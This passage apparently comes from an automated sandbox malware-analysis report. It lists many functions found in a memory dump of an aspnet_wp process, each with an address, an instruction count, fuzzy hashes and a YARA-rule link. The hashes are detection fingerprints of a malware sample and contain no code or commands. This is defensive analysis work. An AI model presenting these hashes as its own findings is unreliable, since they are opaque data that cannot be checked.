Opcode Fuzzy Hash: 9b132eba3fc1a990b31d971a7c66b8ad5636234d44170662cc8cb3c00dd66864
Instruction Fuzzy Hash: 11419572E0462AABCB22DBA88945EFFB7BDBF04694F050566E905F7240D634DD00CBE5

Function 055A35D7 Relevance: .1, Instructions: 139COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2c300d7f86a03933703e09635872856e70952263eb4647515a482bdea46eec2
Instruction ID: f78fa98ec8b7d4b957f5c73bcd4b315fa49ffbea0432f54216dd92691c9837ee
Opcode Fuzzy Hash: b2c300d7f86a03933703e09635872856e70952263eb4647515a482bdea46eec2
Instruction Fuzzy Hash: 77517072200606DFCB15CF54C580EAAFBF6FF45308F1584AAE9099F262E371E945CB90

Function 054DD534 Relevance: .1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 123d6f3fb51cf191246ded8ee1e148b75930c6a021b5f91034cbe5ed16cb98da
Instruction ID: 2ed33e2ebbc98a0612fff1ac9df68daf853f85b6eda5597218885afe29e30ed7
Opcode Fuzzy Hash: 123d6f3fb51cf191246ded8ee1e148b75930c6a021b5f91034cbe5ed16cb98da
Instruction Fuzzy Hash: 47519072B04691CFD721CB18C465FAAB3F6BB44794F4A09A6F80A8B791E738DC40C761

Function 055001F8 Relevance: .1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a4669143c2b23e2c0e99c67183f105b0e1e91347f4ccd0ad1b477b7d88ea599a
Instruction ID: a7eefd9f2afc1e5b0f9fbe1535acf3103b7f2f4240f2e1ba8a5b87bad3447c0c
Opcode Fuzzy Hash: a4669143c2b23e2c0e99c67183f105b0e1e91347f4ccd0ad1b477b7d88ea599a
Instruction Fuzzy Hash: 8741DF35A00216DBCB15DF98C448BEEB7B5BF88710F54916AE806FB2E0D734AC41CBA4

Function 05512750 Relevance: .1, Instructions: 137COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
Instruction ID: c067503536de2d4a588bc3b4a6165536e0dfe6676eed61d65b07d9afd5fe9524
Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
Instruction Fuzzy Hash: AC515B75A40215CFCB55CF98C480AAEF7B2FF84714F2481A9D815AB354E730AE42CF90

Function 0554D1C0 Relevance: .1, Instructions: 135COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0eb649ebbf3548d8df43d0789ceff5cfbc550e3c64e1c06ae1f98d8f26ebe946
Instruction ID: 4c3eb809d57bb6da88242c97b7f7b381bc5f433f52abd080ae0cbe743cbe5947
Opcode Fuzzy Hash: 0eb649ebbf3548d8df43d0789ceff5cfbc550e3c64e1c06ae1f98d8f26ebe946
Instruction Fuzzy Hash: 3C510975A04206DFCB18CFA9C581AA9BBF1FF48314B14856ED81A97345D734EA90CF90

Function 054D6154 Relevance: .1, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92ed594e393977350f829f1ad24ff9dfbe1bd2207983ef11fd21dfcac00c1a96
Instruction ID: 1426c4a062759e2217a7215c679192147cb1b6c12d34a22d917039ffc8f5d2c3
Opcode Fuzzy Hash: 92ed594e393977350f829f1ad24ff9dfbe1bd2207983ef11fd21dfcac00c1a96
Instruction Fuzzy Hash: A851F270A042069FDB29DB68CC19BE9FBB2FF05314F0542EAD41AA72D0DB749981CB50

Function 054CB136 Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 224fc4807e79b46cdebab028534fa6a2febae2b968c00282be48bf1b42b0e665
Instruction ID: 81a241994c6dd4d79af6ac77bf343725e36480c2fffe26f474e1144881a4a48a
Opcode Fuzzy Hash: 224fc4807e79b46cdebab028534fa6a2febae2b968c00282be48bf1b42b0e665
Instruction Fuzzy Hash: BC41CF75640611EFCB26EF69C849BAEBFA9FF80794F4044AAE5129B290DB70DC00CB50

Function 0559866E Relevance: .1, Instructions: 129COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
Instruction ID: 9540b1160b03857c8f4f7d16a3f361a5a91f373c920d9ac3ad09fc46a6030553
Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
Instruction Fuzzy Hash: 7241A675B14145ABDF19DF99CC84ABFB7BABF89600F244069E405A7341D778DE01C7A0

Function 054FA470 Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b248ddeda0bf2a33e1d83ef194400b0c6edd954d9e6c9b757c747a8e8a4362f1
Instruction ID: e7cf46d29b73516d770cd3ce6ab315110359a259aacc4e57c2db95a900d45228
Opcode Fuzzy Hash: b248ddeda0bf2a33e1d83ef194400b0c6edd954d9e6c9b757c747a8e8a4362f1
Instruction Fuzzy Hash: F041DD32A04604CFCF11CF69C896BEE7BB5FB08311F04129BE51AAB380DB349905DBA4

Function 054FD6E0 Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 36c495d0a2bcec62722d192541ac19713d83f13a9de7a9cd4d7410bd8578105a
Instruction ID: 6033b9799287504efae427192b0a75d2286918dc35b1afeaf915602096b7da31
Opcode Fuzzy Hash: 36c495d0a2bcec62722d192541ac19713d83f13a9de7a9cd4d7410bd8578105a
Instruction Fuzzy Hash: 2E41E671A14601DFD721EFAACC95E6ABFA9FF85320F00052EF91947290DB38E815DB91

Function 054CA020 Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
Instruction ID: 8e6ea15a01d112ebb89c424645cc97d87935248e62dc143a3ef3ccafe17f09ca
Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
Instruction Fuzzy Hash: 72413C35B0C229DBCB10DE578484BFABB72FBC57A5F1580AFE9458B280D6318D40C791

Function 05500710 Relevance: .1, Instructions: 121COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
Instruction ID: 3e200240b76b42a9785927943be092769fcbe430f04ce63a8f998c01ec8488db
Opcode Fuzzy Hash: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
Instruction Fuzzy Hash: 19412675A04605EFDB24CF99C988BAAB7F9FF08700B50496DE556D72E0D330AA44CF90

Function 054D262C Relevance: .1, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 629544305ab5599cd0b2a78170a11aa4b04e8ae6d65b5ac843074a86c31ef413
Instruction ID: e54d11549608d8fc184d040a0f68b10b79f844a8dbbb580f4e3f10fb6f3b7f07
Opcode Fuzzy Hash: 629544305ab5599cd0b2a78170a11aa4b04e8ae6d65b5ac843074a86c31ef413
Instruction Fuzzy Hash: AD41B279605700CFC761EF65C954AA9FBF2FF85310F10819FD406972A0DBB0A942CB61

Function 055507C3 Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62b3aeb74c661741aba345d805e264258fa8f08ccecd0fce45e1e33409dad7f0
Instruction ID: ef7ba652ef1be315fc08eb2e1d6b75bf9465a7c4fc0627843f3fd97ed04ab09a
Opcode Fuzzy Hash: 62b3aeb74c661741aba345d805e264258fa8f08ccecd0fce45e1e33409dad7f0
Instruction Fuzzy Hash: 3C4160716143419FD760DF29C849F9BBBE8FF88764F104A2EF99897290DB709904CB92

Function 055505A7 Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d9dbf638d97e5cef4063a24564538183546a44ce8b13af68199b79a17df453d
Instruction ID: cce48020ac85fb27619bddf8f3231b4427d5d73e399d44ec14aeb6f98cc133c4
Opcode Fuzzy Hash: 0d9dbf638d97e5cef4063a24564538183546a44ce8b13af68199b79a17df453d
Instruction Fuzzy Hash: F141C3726086429FC320DF69C854AAAB7E9FFC8710F140A1EF895976A0E730E905C7A5

Function 054D5702 Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 933e4445020a72548859e83ebcf770a6d9ee86ca78062bf713192a4fcc961760
Instruction ID: e8fa31afe6258d053ce724f6e5eca6a925f61c4e29179c5cb989c1793e86dbde
Opcode Fuzzy Hash: 933e4445020a72548859e83ebcf770a6d9ee86ca78062bf713192a4fcc961760
Instruction Fuzzy Hash: 3E31C031301A06EFCB95DF25C998EEAFB66FF44304F10002AE90547A60DB70E821CBE0

Function 054F50E4 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9736ef1e2d2fe6ed3e8edd6ff05ccc53a0216fb05e956db353e68a80ecb75403
Instruction ID: d3944797163cef06307a919cd13397310c1fb45ef46b983557ed3331058d80f1
Opcode Fuzzy Hash: 9736ef1e2d2fe6ed3e8edd6ff05ccc53a0216fb05e956db353e68a80ecb75403
Instruction Fuzzy Hash: BF31E631B083419BD721DA1DC910BE7B7D6BB85794F08856FF6858B384E674EC41C792

Function 054CB480 Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3852e8e5455ef812a236d3b3930b2d667c56af71d3156845e3de2776cf71ef9
Instruction ID: 41058aa6a5015363b107b346d6c72154d83badb614b392b4c53e22469d7fcf75
Opcode Fuzzy Hash: f3852e8e5455ef812a236d3b3930b2d667c56af71d3156845e3de2776cf71ef9
Instruction Fuzzy Hash: 9A312136200604AFC721DF14C841AA67BAAFF84368F9442AEEC454B391DB31ED42CBD0

Function 055961C3 Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15e2c44b9e0fe9ad33e470dbb12272ddbfd50c2f83a34a95288dd5260c1837d0
Instruction ID: a33de08dd8319ee64e6b01c2ca585a4b6d9d89572c87f8cdb76a399b78d53daa
Opcode Fuzzy Hash: 15e2c44b9e0fe9ad33e470dbb12272ddbfd50c2f83a34a95288dd5260c1837d0
Instruction Fuzzy Hash: F431D076A0021AEBDF19DFA8C844FAEF7B9FB44B40F514169E801AB244D774ED04CBA4

Function 054C9730 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a54dce1623e1c2e7c223fcf68da1f22adbe4984b1ce55408549b0a040d7fdfcb
Instruction ID: 299570955e4a6f1dc950cdb4cc1165f9b0f602295217c3cab693b4d85f61a054
Opcode Fuzzy Hash: a54dce1623e1c2e7c223fcf68da1f22adbe4984b1ce55408549b0a040d7fdfcb
Instruction Fuzzy Hash: F821D37AA05619EFC322DF598444B9ABFB5FBC4B60F1604AFA5559B340DB70E801CB90

Function 054D07AF Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41f4830fcde060f91f71c176989a6802ba4a6658999f58b11bcb019c68a2dcf0
Instruction ID: 9df7c84d2c49b65df00a1b99c00b774169267e381ee1532dda739bb9dfe42080
Opcode Fuzzy Hash: 41f4830fcde060f91f71c176989a6802ba4a6658999f58b11bcb019c68a2dcf0
Instruction Fuzzy Hash: FE31BF32A04611DBC712DE6588ACEABFBA6ABC4250F01456EFC5DA7310EA30DC1287F1

Function 054D8550 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 565944ef888c95c8fbeb6e6a95e50ef2a2d8d2081e6094f745bab27eee249953
Instruction ID: 3193d720a1c2e52b81cb1f4face48b60f505a40d36d96d4976e944307207ae21
Opcode Fuzzy Hash: 565944ef888c95c8fbeb6e6a95e50ef2a2d8d2081e6094f745bab27eee249953
Instruction Fuzzy Hash: 7F3167766097018FD360CF19C860B6AF7E5FB88740F0549AEE88A9B350D770F848CBA1

Function 054CD6AA Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 759af7da7484718429cce7f3e89ec17e8e493d8f66f8a62f4e587b70ab487789
Instruction ID: 9956eecf0953ebef9a18d5f7a3f025f2304f172d13e491ed194bcfd9beee9341
Opcode Fuzzy Hash: 759af7da7484718429cce7f3e89ec17e8e493d8f66f8a62f4e587b70ab487789
Instruction Fuzzy Hash: 7E31843AA02144ABDB62DE54C984FAA7BA9BBC0750F1584FEED069B250D374DD41CB90

Function 054D57C0 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b5c56e3ac7964d7f9a8e62fef6907b0fbe70c97a2af712f609a12ba5cbc1bbb
Instruction ID: bf5ac4439e692fee23bd06ef8b303bb5ed3ed5e0c90825d5db966aee473eff39
Opcode Fuzzy Hash: 4b5c56e3ac7964d7f9a8e62fef6907b0fbe70c97a2af712f609a12ba5cbc1bbb
Instruction Fuzzy Hash: 37316D35715A06EFDB52DB25DA58EA9FBA6FF84210F54506AE80187B50DB30E831CB90

Function 0550A6C7 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
Instruction ID: b375ca25043c67c8832d139ce1dc5298c0ea6633fb5f626680da50a5c5370acf
Opcode Fuzzy Hash: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
Instruction Fuzzy Hash: B3313A72B04B01AFD764CF6ACE40B67B7F9BF48A54F04492DA59AC3690E630E900CB64

Function 05527190 Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d9f232daa6456112ef7cca9ac13d1ecc1d2608bc40d33be58fee952b0e99bbe
Instruction ID: 8a74c6e5638f7eba2d42daa73cb9c3792b6393ba4a622f0b56f998dbbe0a51e0
Opcode Fuzzy Hash: 3d9f232daa6456112ef7cca9ac13d1ecc1d2608bc40d33be58fee952b0e99bbe
Instruction Fuzzy Hash: 5C318735604216CFC710CF19C480956BBF6FF8E310B2886A9E9589B3A5E730ED06CF91

Function 054CE420 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39dc5fed504a4e18e0649c7fc08595276b7d9052f83fe0ca68a26f1027a512a9
Instruction ID: ead3e75a42f8ea118db6f6f633b93839670c6debc2acb71daa2b81ab8a356100
Opcode Fuzzy Hash: 39dc5fed504a4e18e0649c7fc08595276b7d9052f83fe0ca68a26f1027a512a9
Instruction Fuzzy Hash: 0F31E436A001189BDB32DF14CC41FEEBBBDAB45740F0001EAE646A7290D774AE919F94

Function 054CC156 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d764720dc4e9b77dd79c8564bafa62e29e37208e7ab57304c63d3c59e241790e
Instruction ID: 0909b97d3f313ccc5a382b64daedb68c86eae4a0c7c60ec05eb0f8081ad07dfe
Opcode Fuzzy Hash: d764720dc4e9b77dd79c8564bafa62e29e37208e7ab57304c63d3c59e241790e
Instruction Fuzzy Hash: C931E8766002108BC721AF28C849BB97BB5FF81314F58C1AED8469B381DE78D987CB90

Function 05504588 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
Instruction ID: 5e3161e31a0898bb7d9dedfe05268fe806cd3fcd16de9648ab9c6e23f28bdf47
Opcode Fuzzy Hash: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
Instruction Fuzzy Hash: 62218331B00649EFCF15CF98C984A9EBBB5FF48714F108169EE199F281E671EA05CB90

Function 055044B0 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 69811584f8036cca1897642a83825c9f6754294b9fd24a6d1f4ca55ee9f357ec
Instruction ID: 019877c77f33bb2005c97e6aaa989b50cb8f6ecca8c1b1fdecaac6f17e8768d6
Opcode Fuzzy Hash: 69811584f8036cca1897642a83825c9f6754294b9fd24a6d1f4ca55ee9f357ec
Instruction Fuzzy Hash: 4D21C172608745DBCB21DF19D980B6B77E5FB88760F054A19FE59AB280D770E900CBA2

Function 0554E609 Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e80bb7baf7af3181a5af9fcd7bf8e1cbe9c9b92529418d026940bf21c077765d
Instruction ID: a8da20275c4ce8c27a7d4998d07cf22aab0a03c8a00133f0e094fbcf3965194a
Opcode Fuzzy Hash: e80bb7baf7af3181a5af9fcd7bf8e1cbe9c9b92529418d026940bf21c077765d
Instruction Fuzzy Hash: 90317E75A00205EFCB14CF5CD8859AE77BAFF88708F15445AE80A9B391E771EA40CF95

Function 0550D530 Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 553e8ccd8b772b709d3f950abc89746952b73eb6357051e07527b384aa73e31a
Instruction ID: cbe412208d66d2c4fcbd6a8807df6baca3c21f852169588452c3e66323c3373c
Opcode Fuzzy Hash: 553e8ccd8b772b709d3f950abc89746952b73eb6357051e07527b384aa73e31a
Instruction Fuzzy Hash: 3C21B1726097109FCA21EBA9C949F577BF9BB84758F04082AB94597290EB20D904CBA5

Function 054D3616 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a88b4d2615a2cb656024d900782b0824b70a4f45a4f00780a761068eb12eb5bd
Instruction ID: 2b1c127024b76780c4f2c3cd5ada3b6aa862f77a0eef0667cd48ffdc148a7ae3
Opcode Fuzzy Hash: a88b4d2615a2cb656024d900782b0824b70a4f45a4f00780a761068eb12eb5bd
Instruction Fuzzy Hash: 6F21E3312097509FCB319F49C958BABFBA6BF85B10F454DAEE8411B750C6B1E904CBA2

Function 055506F1 Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a2deb50d0ca989e3c1365c4ed2dbc3c08ef1814714773bb79c5941b300c8532
Instruction ID: 8f43a9a2cd3b4108b5c1f2d7ddbc8af7fcb5cd08731927425e982d83427cffe3
Opcode Fuzzy Hash: 2a2deb50d0ca989e3c1365c4ed2dbc3c08ef1814714773bb79c5941b300c8532
Instruction Fuzzy Hash: 01218071A106299BCF10DF69C895AFEBBF8FF48750B50006AE841A7250E778AD41CBA0

Function 05509660 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 42ac3e9e75b674554a4d066609d05995130cb6021cabddd239338ca7c8b88907
Instruction ID: e49b53f59bf18b0d104eaa80b6d226eb52f56fee26ee64dd662dd129cdcabcf4
Opcode Fuzzy Hash: 42ac3e9e75b674554a4d066609d05995130cb6021cabddd239338ca7c8b88907
Instruction Fuzzy Hash: 9121E531204A019FCB31EA29CC54F767BF3BB80324F105A1EE856475E5EA21E941CF96

Function 0555019F Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 069f74df309ca13af7084b0101ba9e3865f6aabb9c8d7d54ed9bb99bc2004614
Instruction ID: 2484f042629b241f6d06df4f9cf95eae47e4dbc56c8bb6f8c27bd0119f368fb6
Opcode Fuzzy Hash: 069f74df309ca13af7084b0101ba9e3865f6aabb9c8d7d54ed9bb99bc2004614
Instruction Fuzzy Hash: 9E21AE71600644AFD715DFA9C858F6AB7B8FF88750F1400AAF945DB6A0D634ED40CBA8

Function 055771F9 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1835508384.00000000054A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 054A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_54a0000_aspnet_wp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff51ac79b7f5b52bff454d697698f472c5957de24f36dd370d9a49de1aab136f
Instruction ID: c42b49fd2eba712b4a7937e1dcbe94564b6a7683a98163b512a29a133811230a
Opcode Fuzzy Hash: ff51ac79b7f5b52bff454d697698f472c5957de24f36dd370d9a49de1aab136f
